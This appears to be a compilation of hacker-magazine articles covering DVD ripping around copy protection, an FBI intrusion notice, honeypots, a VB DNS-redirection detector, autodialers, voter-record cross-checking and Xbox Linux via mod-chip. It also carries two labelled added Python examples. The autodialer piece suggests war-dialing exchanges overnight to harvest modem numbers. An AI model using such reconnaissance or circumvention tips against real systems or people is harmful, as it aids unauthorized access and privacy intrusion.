The rest of the first page is chapter selection for if you only want to rip certain scenes (like Monty Python sketches). The second tab is called "Stream Processing" and allows you to select the languages and special tracks you want ripped. I usually just rip them all and then only convert the English track, but if you're hard pressed for drive space, then cut out what you don't want. Next, click the settings tab. Under settings, I recommend setting key-check to "Every VOB File" and filesplitting to "Max Filesize". Now set the max-filesize to 10,000MB (10gb). This way the movie will be ripped to one big file on your hard disk. (Warning! This is only possible with NTFS. If you have a FAT file system, set max-filesize to 4,000MB.)

3: Click start and wait until the DVD is finished. It shouldn't take more than an hour.

4: Fire up DVD2AVI. Once again, I recommend taking a look around the program before blindly trying to follow my steps. Go to file->open. A blank box will appear with three buttons on the left side. Click "Add" and add the file(s) you just ripped to the box, then click OK.

5: Press F5 to make sure the movie looks OK and the VOB files are in the right order. You will not have audio and the video will be fast. This is normal. Make note of the aspect ratio on the box that pops up along the right side. You are almost ready to convert to either AVI or d2v/wav. Check your menu settings. For audio: Track number should be "1", channel format should be "Auto", Dolby Digital should be "Decode", MPEG Audio should be "Demux", and 48->44.1 should be off. Video settings should be left alone.

6(A): AVI users rejoice! This is the last step for you! Go to file->save AVI, pick a filename and location, and click "Save". Now a box pops up asking you to select your preferred video compression method. Choose your poison (I recommend DivX 5.0.2) and click OK, then sit back for a few hours while it converts. If the file is too large, find an AVI splitter out there.
I've heard AVIChop is good.

6(VS): VCD and SVCDs need a few more steps. Still in DVD2AVI, click file->save project. Name the project and click "Save". It will run through the movie file once or twice and then beep when it finishes. This process should take less than the ripping process, but it depends on your processor. Once it's done, write down the contents of the "Aspect Ratio" and "Video Type" boxes. We need that information in TMpgEnc.

7: (From now on, all unlettered steps refer to VCD and SVCD only, since AVI users should have stopped reading this already.) Now we have a *.d2v and a *.wav file. We need to merge these into a single MPG file. Fire up TMpgEnc. Once again, take a look at what it can do before trying to rip - this program in particular is very useful. I highly recommend playing with the "MPEG Tools" under the file menu. Now that you are ready to go, check out the bottom of the main TMpgEnc screen. You have three boxes there: "Video Source", "Audio Source", and "Output File Name". For video source, we want the *.d2v file we just created, and for audio we want the *.wav file. (Side note: listen to the wave before finishing this step. If it's not the audio track you want, go back to the DVD2AVI step and select a different audio stream from the audio menu until you get the one you want.) For the Output file name, select where you want the MPG file to be saved. Now we need to set up the encoder. Click the "Load" button next to the output file name box, and navigate to the "TMpgEnc\Template" folder. From here we have the choice of loading a number of templates, but we're interested in only four: VideoCD (NTSC), VideoCD (NTSCFilm), SuperVideoCD (NTSC), and SuperVideoCD (NTSCFilm).

8(V): VCD users check where you wrote down the "Video Type" from the end of step 6. If it was higher than 90 percent Film, load the "VideoCD (NTSCFilm)" template.
If the video type was anything else, just load "VideoCD (NTSC)". Now click setting. Leave everything alone except for this setting: Under advanced, change the "Source Aspect Ratio" to what you wrote down from "Aspect Ratio" at the end of step 6. Now click OK to go back to the main window. You're ready to convert to MPG. Click "Start" in the top left corner and then get some sleep. It takes up to three hours on a 2ghz Athlon machine, probably much much longer for most of you.

8(S): Video CD users, use the instructions from step 8(V) - just load the SuperVideoCD templates.

9: Boy, that took a while. Now we have an mpg file of the complete movie. Check it for quality, audio synch, and general not-being-screwed-up. When you're satisfied that the file is complete, it is safe to delete all the other files that you used for this project. Now the file should be roughly a gig for a normal length movie. We need to split it up. Stay in TMpgEnc. Remember when I mentioned the cool MPEG Tools? We're going to use one of them now. Go to file->MPEG Tools. Click the "Simple De-Multiplex" tab. Load the mpg file of the movie into the "Input" file box, and the other two should be automatically filled in for you. Click the start button. It will rip the MPG file into a *.m1v and a *.mp2 file. These we need to load into BBMpeg. Go to the BBMpeg folder and run "AVI2MPG2". It looks very confusing when it loads, but don't fret. Take a look around again. What we need to do is simply click the "Start Encoding" button, ignoring the very confusing initial interface. Click the Settings button. We need to set something on three out of the four tabs you now have access to. On the "General Settings" tab, set the "Max Size(MB)" to a number equal to roughly half the filesize of the file you have, but don't go higher than 10MB less than the size of your CD you will burn it to. I like to keep mine set to 640MB, it seems like a pretty standard size.
On the "Input and Output Files" tab, we need to set three things. The "Program Stream File" is the name of the output file you want. Your half-movies will be called {filename}01.mpg and {filename}02.mpg. Now for the "Video Stream File" and "Audio Stream File", use the *.m1v and *.mp2 files we just created, respectively. The last tab is the "Program Stream Settings". Simply choose "VCD" or "SVCD" from the radio buttons. The fourth tab allows you to save your settings for this program. Do so if you are going to be using it a lot. Click OK to get back to the "Start Encoding" screen, then click "Start". This shouldn't take very long.

10: Now we have two (or sometimes three) files that are small enough to fit on CDs. Load up Nero. In the "Create CD" dialog, Nero should have options for both VCD and SVCD. Select whichever applies. Under the ISO tab, select "ISO Level 2" for the filename length, and "ISO 9660" as the character set. Also check all the boxes under "Relax ISO Restrictions". Now we are ready to burn. Click "New" and it will take you to a normal CD creation screen, except the CD window has both a directory structure and a file list box in it. Drag your file to the white box under the directory tree, not into the tree itself even if you know where it goes. Nero will check the file. If it complains, just ignore it. It should still work. Now burn... and you will have yourself a fresh VCD or SVCD. Repeat this step for the rest of the disks needed to get the full movie.

11(V): Playing VCDs on computers: You can use a software VCD player, or just go into the CD and open "AVSEQ01.dat" in the "MPEGAV" folder with your favorite media player.

11(S): Playing SVCDs needs a compatible DVD software player or an MPEG2 codec for your Media Player. Personally, I use ATI's media center, or Power DVD.

12: Enjoy!

Props to KalLI - I learned how to rip DVDs using his site.
Also, check out afterdawn.com - there are some good things on there. I would also like to ask Wilson to read this article aloud to the class like he always does. Thanks.

Links
http://www.afterdawn.com/software/video_software/dvd_rippers/smartripper.cfm
http://www.afterdawn.com/software/video_software/dvd_rippers/dvd2avi.cfm
http://www.afterdawn.com/software/video_software/video_tools/tmpgenc.cfm
http://members.cox.net/beyeler/bbmpeg.html
http://www.adaptec.com/worldwide/support/driverdetail.html?cat=/Product/ASPI-4.70&filekey=aspi_v470.exe

U.S. Department of Justice
Federal Bureau of Investigation
In Reply, Please Refer to File No.

The NASA Office of Inspector General and the FBI are conducting a joint investigation into unauthorized computer intrusions that have affected both the government and private industry. During the course of this investigation, we discovered a log file listing Internet Protocol addresses and server names, it appears to be a list of computers that were compromised. In order to notify the potential victims of this criminal activity and enable them to check their own systems, we have compared the log of IP addresses and server names against the most recent information available in the WHOIS database. This letter is being sent to you because the IP address or server shown below, and last registered to you, appeared on the log file of apparent victims. We have no indication that the intrusions associated with this activity are continuing. We also are unaware of the hacker's methodology against your system, the potential level of access, or the possible damage to your system.
The time frame of the activity to which the log file relates occurred between December 2001 and March 2002, with the majority of the activity occurring in mid-February 2002.

This communication is being provided to you by the Watch and Warning Unit of the National Infrastructure Protection Center (NIPC), located at FBI Headquarters in Washington, D.C. In addition to the recommendation that you check your log files for indications of unlawful activity and take appropriate mitigation action, NASA and the FBI request that you provide any information relating to this matter to the NIPC by e-mailing the Watch at nipc.watch@fbi.gov. For recommendations about examining your systems in a manner that helps preserve the evidentiary value of information you discover, please refer to the NIPC website at www.nipc.gov/incident/incident2.htm.

System(s) Information

(The kicker of this is that both the contact and domains referenced had nothing to do with us and we were apparently sent this letter in error. Yet more wasted time and resources. The Watch and Warning Unit?!)

by Bland Inquisitor
bland_inquisitor@hotmail.com

Honeypots are usually programs that emulate services on a designated port, but once successfully cracked, offer no real power to the attacker. The honeypot program will then alert the admin that an attack is in progress, and will allow the admin to track the attacker's every move. Honeypots will also show the methods the attacker is using to gain entry, and what methods are being used to cover his or her tracks. In this article, I will show how honeypots work, why honeypots are not generally practical for most security situations, and how honeypots are breeding both smarter attackers and dumber admins.

How Honeypots Work

Honeypots are designed to operate on many levels. They increase the time an attacker will spend because the honeypot makes it unclear which attacks work and which ones don't. They let the admin know what method an attacker is using before they succeed - such as port scanning, brute forcing a password, or a Sendmail attack. Once honeypots are widely implemented, the attacker will be forced to spend more time in a system that may be closely watched, and will eventually be scared off. Also, once xy63r ninja the script kiddie stops going anywhere near the system, admins can focus all their attention on fending off people with actual skill.

In one of the honeypot advertisements I read, port 365 was being used as the honeypot port. This means that a scan that returns port 365 as active will make the would-be attacker turn and run off, and that systems that are not running the honeypot can use port 365 as a bluff, so that when xy63r ninja the script kiddie sees it and the system looks sexy, he will be less inclined to go in because he thinks that the vulnerabilities he sees are a deception. According to SecTech systems administrator Dan Adams, honeypots are "like opening a fake store, loading it with cool stuff, and sitting back hoping someone will break into it."

Honeypots are catching a lot of pretty serious heat from the legal and ethical community. Some critics are calling honeypots entrapment. Let me clear this up for you. Entrapment occurs when a person is coerced to commit a crime that they would not under normal circumstances engage in. It's going to be next to impossible for poor xy63r ninja to use an entrapment defense in court, because by the time po po shows up, it will be obvious he was lame-assing around of his own accord. However, if a crafty admin goes on IRC and tells everyone that his honeypot is actually the fabled government computer that holds the truth about the Kennedy assassination, Area 51, and ancient methods of dolphin flogging and people hack him, then an entrapment defense would stand a chance. The reason is that the admin could never prove that xy63r ninja and his crew were going to hack his system without being enticed.

Other critics say that honeypots are akin to electronic wiretapping. This I can agree with. Since there is not much legal regulation of honeypot technology, and the closest legal procedures are loose at best, some very scary things could happen. Other companies could expand the basic thrust of the technology, perhaps into the p2p networks. At that point it would be us, the hacker community, that stands up and tells the world that this is a gross invasion of privacy. Then, pretty much just like the MPAA did to us, all they would conceivably have to say is: "Consider the source, your honor. Hackers want this technology stopped. Hackers are criminals. You don't want to side with criminals, do you? We are here to protect the American people from hackers, and we need you to be brave and give us the power to shut these nasty people down." Then in all likelihood, the corporations would roll right over us again. I don't think it takes a major leap of logic to see that this is where honeypot technology, or more specifically, technology that clearly violates people's rights under the guise of protection, could be headed. Also, I don't trust the "good guys" any farther than I can throw them. We need to put a handle on the situation before the "security community" gets any ideas on how to further expand their powers past our rights on the backs of the hacker community they demonize to get their way.

Why Honeypots Are Not Practical For Everyone

The good news is that honeypots are not a true "solution." The best application for a honeypot is to track an intruder who has already made a home in the system. The most noteworthy case of this happening was documented by Clifford Stoll in his book The Cuckoo's Egg.
Stoll was an admin at Berkeley when he found an intruder using his system to steal secrets. But only an admin who has been around the block a few times and watches his system often can make full use of honeypots. Apart from that, over 90 percent of attacks against a system come from inside, and there is nothing a honeypot can do to stop someone who has internal access from running amok. For the average company, the extent of a honeypot's effectiveness is to keep xy63r ninja and the rest of the script kiddies away, and to show that there is a real threat of people breaking into the system. It is almost unheard of that a honeypot traps someone with real skill because it is designed to keep the kiddies at bay.

In the digital arms race, tightening the existing security holes will only force the attackers to get better while the admins get complacent. Most admins are only slightly better than good ole xy63r ninja in the first place - they get the latest and greatest piece of ready-made software and call themselves experts. What is bound to happen in the majority of the situations is that a company sets up a honeypot and never bothers to spend the time it takes to maximize its effectiveness. Of course, the true answer is for admins and software programmers to actually take a little pride in their work and do their jobs properly. Also, it would help if software companies would take some responsibility when they find security holes in their product and update accordingly. System admins should also feel obligated to keep their software current, and make sure nobody within their company is given more access than they need.

Shout outs: stankdawg, grifter, debug, project honeynet. And an apology if anybody actually uses the name xy63r ninja.

Redirection stopped
by c0ld_b00t

The letter from "bradsnef" in 19:3 about how Ford could redirect back to 2600.com or 127.0.0.1 etc. got me thinking about how easy that could be. It turned out to be easier than I thought.
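The check this article goes on to describe, comparing the HTTP Host field with the server's own names, shown here as an added Python example (not the author's VB program). The host names, the address 192.0.2.10 and the sample requests are constructed; the example goes a little further than the article by handling header case, a port suffix, a trailing dot and a missing or duplicated Host field.

```python
# Added example (not from the article): decide from the Host field whether a
# request was addressed to this site or arrived through someone else's DNS name.
# All host names, the address and the sample requests below are constructed.

OWN_NAMES = {"www.example.org", "example.org", "192.0.2.10"}  # assumed site names and IP

REQ_OURS = (b"GET / HTTP/1.1\r\nAccept: */*\r\n"
            b"Host: www.example.org\r\nConnection: Keep-Alive\r\n\r\n")
REQ_FOREIGN = (b"GET / HTTP/1.1\r\nAccept: */*\r\n"
               b"Host: redirected.example.net\r\nConnection: Keep-Alive\r\n\r\n")
REQ_MIXED_CASE = b"GET / HTTP/1.1\r\nhOsT:  WWW.Example.ORG.:8080\r\n\r\n"
REQ_NO_HOST = b"GET / HTTP/1.0\r\n\r\n"


def extract_host(raw_request: bytes):
    """Return the normalized Host value of a raw HTTP request, or None."""
    head = raw_request.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    values = []
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        # Header names are case-insensitive, so "host:" and "HOST:" count too.
        if sep and name.lower() == "host":
            values.append(value.strip())
    if len(values) != 1:                         # missing or duplicated: unusable
        return None
    host = values[0].lower()
    if host.startswith("["):                     # IPv6 literal such as [2001:db8::1]:80
        end = host.find("]")
        if end == -1:
            return None
        host = host[1:end]
    elif ":" in host:                            # drop an explicit port
        host = host.rsplit(":", 1)[0]
    host = host.rstrip(".")                      # "www.example.org." is the same name
    return host or None


def classify(raw_request: bytes, own_names=OWN_NAMES) -> str:
    """Return 'ours', 'foreign' (someone else's name points here) or 'no-host'."""
    host = extract_host(raw_request)
    if host is None:
        return "no-host"
    return "ours" if host in own_names else "foreign"


def respond(raw_request: bytes, own_names=OWN_NAMES, redirect_to=None) -> bytes:
    """Build the reply: serve our own names, turn away everything else."""
    verdict = classify(raw_request, own_names)
    body, extra = b"", ""
    if verdict == "ours":
        status, body = "200 OK", b"normal page\n"
    elif verdict == "no-host":
        status = "400 Bad Request"               # HTTP/1.1 requires exactly one Host
    elif redirect_to:
        # The article's filter answers a foreign name with a redirect.
        status, extra = "302 Found", f"Location: {redirect_to}\r\n"
    else:
        status = "421 Misdirected Request"       # refuse names that are not ours
    head = (f"HTTP/1.1 {status}\r\n{extra}"
            f"Content-Length: {len(body)}\r\nConnection: close\r\n\r\n")
    return head.encode("ascii") + body


if __name__ == "__main__":
    for label, req in [("ours", REQ_OURS), ("foreign", REQ_FOREIGN),
                       ("mixed case", REQ_MIXED_CASE), ("no host", REQ_NO_HOST)]:
        print(label, "->", classify(req), "|", respond(req).split(b"\r\n")[0].decode())
```

A plain substring search for "Host: " misses the lowercase, port-suffixed and duplicated forms above, which is why the example parses the header block line by line.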
Every http request has a host field in it that contains the address that was typed in, so if I type in "www.2600.com" and click "Go" it will have www.2600.com in the host field. All browsers that I know of send the host field in their http request. If DNS redirects a site, the host field will not change when redirected and so we can detect it with little effort.

Example of a HTTP request (notice the host field):

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Host: www.2600.com
Connection: Keep-Alive

Included is a small VB program (I used VB to show how easy it is) that scans all incoming http requests and checks to see if the host field is the web address or the IP address of the current website. If not, it redirects to 2600.com, and if so it redirects to Ford's website. This doesn't protect from meta tag redirection, or (I)FRAME redirection which needs a webpage to do the redirecting, rather than a DNS entry. Here is a script that can stop that (real simple - it took five minutes). Hey, a 16 year old can do it, so can a big corp.

OK, here is the DNS Redirection filter made in VB. Note: If you are going to set this filter up you'll have to change your server port to something other than 80 and change the meta headers to redirect to that port (big deal, unless you're running IIS). You could add this feature to an open source web server, too. You could alter the code to redirect to the port directly.

Step 1. Create a project with "Standard EXE".
Step 2. Add a Winsock component and name it Winsock1 (that's the default).
Step 3. Change the properties of Winsock1's Index tab to 0.
Step 4. Make a form and name it Form1 (default again).
Step 5. Put the code below in the form.
'DNS Redirection filter
'by c0ld_b00t
'for Fored(lol) and NPR
Private webaddress As String
Private webip As String
Private intlastcontrol As Long

Private Sub Form_Load()
    'remember our own host name and IP, then listen on port 80
    webaddress = LCase(Winsock1(0).LocalHostName)
    webip = Winsock1(0).LocalIP
    intlastcontrol = 0
    With Winsock1(0)
        .LocalPort = 80
        .Listen
    End With
End Sub

Private Sub Winsock1_ConnectionRequest(Index As Integer, ByVal requestid As Long)
    'the listener is element 0; every connection gets its own control
    If Index = 0 Then
        intlastcontrol = intlastcontrol + 1
        Load Winsock1(intlastcontrol)
        Winsock1(intlastcontrol).LocalPort = 0
        Winsock1(intlastcontrol).Accept requestid
    End If
End Sub

Private Sub Winsock1_DataArrival(Index As Integer, ByVal bytesTotal As Long)
    Dim data1 As String
    Dim a1 As Long, a2 As Long, a3 As String
    'use Index (the control that received the data), not the newest control,
    'so two connections at once do not get mixed up
    Winsock1(Index).GetData data1
    On Error GoTo redirectnormal
    'cut the value of the host field out of the request
    a1 = InStr(1, data1, "Host: ") + 6
    a2 = InStr(a1, data1, vbCrLf)
    a3 = LCase(Mid(data1, a1, a2 - a1))
    If a3 = webaddress Or a3 = webip Then
        GoTo redirectnormal
    Else
        'DNS redirection detected redirecting back to 2600.com
        Winsock1(Index).SendData "" 'meta tags here
    End If
    Exit Sub
'here we do a normal redirection to ford.com
redirectnormal:
    Winsock1(Index).SendData "" 'meta tags here
End Sub

Private Sub Winsock1_SendComplete(Index As Integer)
    'close the connection that just finished sending
    Winsock1(Index).Close
End Sub

Step 6: Compile and run.

Shoutouts: Hi Mom, Bryan, Cassidy, my bro (Nathaniel), and whoever I forgot.

More on Telemarketing
by D» Foetus

In response to the number of letters received regarding the TeleZapper and similar systems that will "zap" your phone number from a telemarketing system's database, here is some more insight.

Many larger telemarketing, market research, and bill collection companies use autodialers coupled with CATI (Computer Aided Telephone Interviewing) software systems. It is the job of the autodialer to dial, say,
ten phone numbers for every human agent that is currently seated in their calling center, knowing that one out of every ten phone calls will be answered. The number of calls made by the autodialer can be, and usually is, automatically adjusted depending on how that 10:1 ratio performs. For example, if the sample being dialed consists of phone numbers culled from product registration cards, the number of answered calls may be higher than if the machine is running RDD (Random Digit Dialing) in valid area codes and exchanges, minus already known phone numbers - basically war dialing for unlisted phone numbers.

If you ever get a phone call that shows up on your Caller ID as being from, say, XYZ Research, and it hangs up immediately after you answer, you've received a "nuisance call." This happens when the autodialer has made more calls than there are available humans to patch you to. Your phone number is now flagged and will receive special treatment - the system knows you are home and answering the phone, but it also knows it just hung up on you. You will now get another call from XYZ Research in about 15 minutes (the amount of time lapsed is set by the user system-wide), but this time their system will reserve a human before calling you, ensuring that they get to talk to you.

The autodialing system will eventually have dialed through the entire pool of sample, and it will have pretty much determined which phone numbers are good and which are not. It can distinguish between non-working numbers (those that answer with the familiar tri-tone followed by a recording of some sort), those that do not ring at all, those that are busy, those that are good (no answer, etc.), and those that are fax/modem/machine numbers. Each phone number has a status code assigned to it and any bad numbers are resolved never to be called again.
Aside: Interesting point here is that all the fax/modem/machine numbers will have received a unique status code marking them as such - basically there now exists a pool of phone numbers that have a very high likelihood of being modem numbers. Just as easy would be to set up a project that runs automatically overnight, dialing strictly 202-xxx-xxxx numbers (if you wanted to find machine numbers in the DC area), and have your CATI software just hang up on all good numbers. Look at your "bad: modem number" list in the morning and you've got an excellent start on your fun for the days to come. If one has the desire, and access to a larger system, one could easily burn through tens of thousands of phone numbers in a single night.

But back to the TeleZapper vs. autodialers and other devices. For them to work, your phone must actually go off hook and transmit the tone(s). If an autodialer calls your number and your voice mail picks up, the call is immediately transferred to an available agent, who will mark your phone number as known good, but you're not home (answering machine/voice mail answered). I'm sure you're already ahead of me here, but, the obvious step to take is to record the "bad number" tone(s) as the first part of your outgoing message. Sure, it will annoy the hell out of your friends and family, but it will kill your phone number in that sample pool if it's being dialed by an intuitive autodialer.

Note that I say that sample pool. Your phone number may exist in myriad sample pools at different companies. One way to dramatically cut down on telemarketing calls (and market research calls, if you're so inclined, though they are two very different entities with two very different agendas), is to first register the phone number with the DMA (Direct Marketing Association) as wanting to opt-out of telemarketing calls.
Also, explain to any company you do not wish to hear from that you wish for your phone number to be placed on their "do not call" list. The DMA also allows one to register their mailing address as well as email address as opt-outs to cut down on junk mail and, allegedly, spam email. Not all companies check their sample against the DMA's opt-out list, and not all maintain a "do not call" list, but any company that wishes to do business in an above-the-board manner will heed your request. Telemarketing companies can be somewhat sketchier than market research companies - any market research company that wants to stay in business and make money will follow the guidelines for standards and ethics set forth by the MRA (Marketing Research Association), CASRO (Council of American Survey Research Organizations), and other organizations. A client will likely not do business with a market research company that does not belong to these organizations.

It does take a while for your opted-out phone number/address/email address to trickle down and through the gigantic system that is comprised of sample houses (those that provide the phone numbers, street addresses, and e-mail addresses), and to the thousands of end-users (telemarketers and research companies), but it does work. A perfect time to do this is when moving and getting a new phone number, but it will have an eventual effect if you're staying put as well.

Another option is to sign up for your local telco's "security screening" plan, if available. This will require any caller who is blocking their Caller ID info to input their phone number, or the call will not be connected.
One drawback is that some long distance companies relay calls around the country to the closest low-traffic switching point and the Caller ID info is stripped in the process, requiring Grandma to input her phone number each time she tries to call you, since she's on a fixed income and using Jimbo's Phone Company to make cheap long distance calls.

No one will ever be totally free from receiving unwanted phone calls, but there are ways to dramatically reduce them. As many ways that there are of keeping our phone numbers in the hands of those we want calling us, there are ways of getting around whatever we put in place to try to ensure this. Surely somewhat ironic to those reading this magazine,...

Cracking VOTER Fraud
by Kr@kH3d (DFxC)
(Why the goofy "leet" name? Overkill is funny...)

Some New York 2600 readers may have seen the recent three minute report on WABC's Eyewitness News (10/25/02) on the discovery of suspected fraudulent voters in New Brunswick, NJ. Since I've been a longtime 2600 fan and played a major part in the investigation, I figured I'd outline how we did it. After speaking with the people at the local Board of Elections and realizing how easy it is to commit voter fraud, I also felt it may be of use to others in general. Oh, and if you saw the report, there's a brief shot of my back while I'm at the computer wearing an H2K shirt!

The technique outlined here was developed by the New Brunswick United (http://www.newbrunswickunited.com) Antifraud Division, headed by attorney Flavio L. Komuves. I was lead investigator in charge of isolating possible cases of voter fraud, and was ably assisted by a number of Rutgers University student interns.

I should preface this with the disclaimer that the resources and procedures I am outlining are legally available in New Jersey, and there is no need to obtain any information illegally. Check with your local authorities for your area.
Also, a new law regarding voting was recently signed and certain new provisions will take effect in the 2006 elections. Always take any information you gather to a reputable lawyer and get advice before releasing it publicly - voter fraud is a serious charge and falsely accusing someone (even unintentionally) could probably result in charges against you! Also keep in mind, any information we determined via this method of database searching was later verified by actual field visits to the properties in question.

It's actually rather similar to profiling a system. The first step is to gather all the information possible about your target. Your first stop should be your county Board of Elections. You will have to fill out certain forms - being part of a political organization helps out here, as they reserve the right to ask why you are requesting the information. There are two databases they maintain that you will need to request on CD-ROM: the current Active Voter Registration database ("walking list") and the current Actual Voter Database ("voting history"). There will probably be a fee involved - excessive fees for preparation and other "costs" is yet another way the government restricts your access to information (while insisting on greater access to your information). I believe it should come to approximately $60 for both CD-ROMs and it may take a week or so for them to prepare.

The second stop is your local Municipal Clerk's office. Here you request a listing of all paid city employees ("Municipal Employee List"), specifying the following information: salary, whether or not he or she is a city resident, years of service, job title, and of course name. They must release this information to any city resident as it is considered public information (your tax money pays their salary). Again, they may charge you for costs. In our instance, the City Clerk's office tried throwing us off by refusing to provide us with a CD-ROM version, and instead provided us with a printout of the database. Luckily, volunteers created an Access database and entered the information into it within a day or so. You may also request a listing of all rental properties (and landlord owners) from your city's Rent-Leveling Board or similar body.

OK, so now you have your base documents. You've gathered your information. Now to poke for weaknesses. What next? Well, first look at the Active Voter Registration and sort it by birthday. Any 172 year olds still registered? Probably not. If so, check their names on the Actual Voter Database. In our investigation, we immediately noticed an enormous number of people born on 01/01/1901. According to the Board of Elections this is their standard procedure for dealing with illegible entries and/or people who registered to vote before New Jersey required birth date to be added to the Voter Registration form. Sorry, strike two.

Next, run a query to isolate everyone from like age 99 and up. If you feel there's an overabundance, check the names against the Social Security Death Index on http://www.ancestry.com. Don't get too excited if you find matches though - Americans have the funny habit of naming their kids after themselves. Go to http://www.netronline.com/public_records.htm (Property Tax Records) and make sure it isn't their son or grandson (in one instance we originally thought for sure was voter fraud, there was a son named after his father, who inherited the house his parents had lived in, and then married a woman with the same first name as his mother - creepy!). Be thorough, but don't waste too much time on this - we had a team spend over a month on this and turn up only a handful of "possibles." It might also be helpful to have someone working with you who has access to credit card histories/databases, but I'm not sure if that is legal or how useful it would be in this instance.
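The dead-voter screening described above, as an added example that is not part of the original article or the investigators' own tooling. The table and column names, the reference date, and every sample row (including the stand-in death-index table) are constructed assumptions, since the article does not give the databases' layouts.

```python
import sqlite3
from datetime import date

PLACEHOLDER_DOB = "1901-01-01"  # filler the Board uses for illegible/missing birth dates
AS_OF = date(2002, 11, 5)       # constructed reference date for computing ages

# Constructed sample data: every ID, name and address below is made up.
WALKING_LIST = [  # (voter_id, name, dob, address)
    (1, "JOHN A SMITH",  "1899-03-14", "12 ELM ST"),
    (2, "MARY JONES",    "1901-01-01", "40 OAK AVE"),   # placeholder DOB
    (3, "PETER NOVAK",   "1902-07-30", "7 PINE CT"),
    (4, "ANNA KOWALSKI", "1975-05-02", "7 PINE CT"),
    (5, "GEORGE BAKER",  "1900-11-20", "3 MAPLE RD"),
    (6, "ROSE MILLER",   "1901-01-01", "9 BIRCH LN"),   # placeholder DOB
]
VOTING_HISTORY = [  # (voter_id, election_date)
    (1, "2001-11-06"), (2, "2001-11-06"), (3, "1996-11-05"),
    (4, "2001-11-06"), (5, "2001-11-06"),
]
DEATH_INDEX = [  # (name, birth_year, death_year): stand-in for a death-index lookup
    ("JOHN A SMITH", 1899, 1998),  # same name and birth year as voter 1
    ("PETER NOVAK",  1902, 1999),  # died after his last recorded vote
    ("GEORGE BAKER", 1931, 1997),  # same name, different birth year: a namesake
]


def build_db():
    """Load the three constructed lists into an in-memory SQLite database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE walking_list(voter_id INTEGER PRIMARY KEY, name TEXT,
                                  dob TEXT, address TEXT);
        CREATE TABLE voting_history(voter_id INTEGER, election_date TEXT);
        CREATE TABLE death_index(name TEXT, birth_year INTEGER, death_year INTEGER);
    """)
    db.executemany("INSERT INTO walking_list VALUES (?,?,?,?)", WALKING_LIST)
    db.executemany("INSERT INTO voting_history VALUES (?,?)", VOTING_HISTORY)
    db.executemany("INSERT INTO death_index VALUES (?,?,?)", DEATH_INDEX)
    return db


def age_on(dob_iso, as_of=AS_OF):
    """Age in whole years on the reference date."""
    born = date.fromisoformat(dob_iso)
    return as_of.year - born.year - ((as_of.month, as_of.day) < (born.month, born.day))


def placeholder_count(db):
    """Rows carrying the filler birth date; these say nothing about real age."""
    return db.execute("SELECT COUNT(*) FROM walking_list WHERE dob = ?",
                      (PLACEHOLDER_DOB,)).fetchone()[0]


def classify(db, name, dob, last_vote):
    """Separate a real lead from a namesake or a merely stale registration."""
    matches = db.execute("SELECT birth_year, death_year FROM death_index "
                         "WHERE name = ?", (name,)).fetchall()
    if not matches:
        return "no death record"
    exact = [death for birth, death in matches if birth == int(dob[:4])]
    if not exact:  # name matches, birth year does not: likely a father/son pair
        return "namesake: verify with property records"
    # Year granularity only: a vote in the year of death is not counted as suspicious.
    if last_vote and int(last_vote[:4]) > min(exact):
        return "voted after recorded death: field-verify"
    return "deceased but no later vote: stale registration"


def screen_oldest(db, min_age=99):
    """Registrants aged min_age and up, oldest first, with their last recorded vote."""
    rows = db.execute("""
        SELECT w.voter_id, w.name, w.dob, MAX(h.election_date)
        FROM walking_list w
        LEFT JOIN voting_history h ON h.voter_id = w.voter_id
        WHERE w.dob <> ?            -- skip the 01/01/1901 filler rows
        GROUP BY w.voter_id
        ORDER BY w.dob
    """, (PLACEHOLDER_DOB,)).fetchall()
    leads = []
    for voter_id, name, dob, last_vote in rows:
        age = age_on(dob)
        if age >= min_age:
            leads.append({"voter_id": voter_id, "name": name, "age": age,
                          "last_vote": last_vote,
                          "status": classify(db, name, dob, last_vote)})
    return leads


if __name__ == "__main__":
    db = build_db()
    print("placeholder birth dates skipped:", placeholder_count(db))
    for lead in screen_oldest(db):
        print(lead)
```

Every row this returns is only a lead; the article's own checks against property tax records and field visits still decide whether anything is wrong.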
That takes care of the infamous "dead vote." The next "weakness" to probe is the Municipal Employee List. Hopefully, you know your town pretty well, because how effective your work here will be will be in direct proportion to how well you know your town. The first test is to query all non-city resident employees and run their names on both the Active Voter Registration and Actual Voter databases. Note down any instances, but keep in mind that the individual may have lived in your town at one time, and showing up on the Active Registration Database isn't a crime in and of itself - voting (i.e., being on the Actual Voter Database) is.

Follow this up by running a query with all employees making over, say, $65,000 a year. Run their names on both the voter databases and pay attention to what their registration address is. You may discover some rather well-off individuals living in really shady neighborhoods. In our investigation, we caught the city's Chief of Operations for Urban Renewal voting out of the same run-down apartment in an impoverished high-crime area as a small immigrant family. On investigation of the Property Tax Records, we discovered he lived in a nice home a few towns away! Most of our results came from this method.

If you managed to get a copy of the landlord listings, be sure to check all those names thoroughly as well. A common form of voter fraud is for landlords to register at a property they are renting out. A good portion of our leads were also generated this way by checking landlords we knew had broken the rent-control laws.

The last method we used that had results was to start running names of business owners who operated in town. Much like the landlords, some unscrupulous business owners will register to vote at their place of business.

Well, that's basically it in a nutshell. Hopefully, this short article was informative and useful, as well as a contribution showing that 2600 readers are often more concerned about protecting and maintaining the democratic process than the politicians who scapegoat us as evil hackers. For questions or comments, email dominick@ramiustech.com with "2600" in the subject line.

by Live_wire

Requirements: A mod-chip. Ed's xbox linux (Debian derivative) found at: http://sourceforge.net/project/showfiles.php?group_id=54192. BIOS for mod-chip that allows Xbox to run unsigned code. EvolutionX dashboard.

As some might have noticed, there have been several strides made in the attempt to put Linux on any device in which it would be logically beneficial to the computer/hacker community, or just for the challenge of it. The Xbox is no exception. It is now possible to put a full Linux distribution on the Xbox console, due to the work of some very diligent Linux/Xbox hackers. I will cover the steps to go about installing Linux on your Xbox console and the significance of such an installation.

There are multiple reasons one might want to go about installing Linux on an Xbox. For one, it would serve as a very inexpensive desktop computer. Being that you can now find Xboxes selling at prices of $170-$200, this is understandably worthwhile. The Xbox is also feature-rich. It is a gaming console, DVD player, and now with the inclusion of Linux, can be your desktop computer, DivX player, and web/ftp server. Perhaps you would use it just to run nominal functions, saving your main computer the stress. This is just the beginning, though. The possibilities are, obviously, limitless.

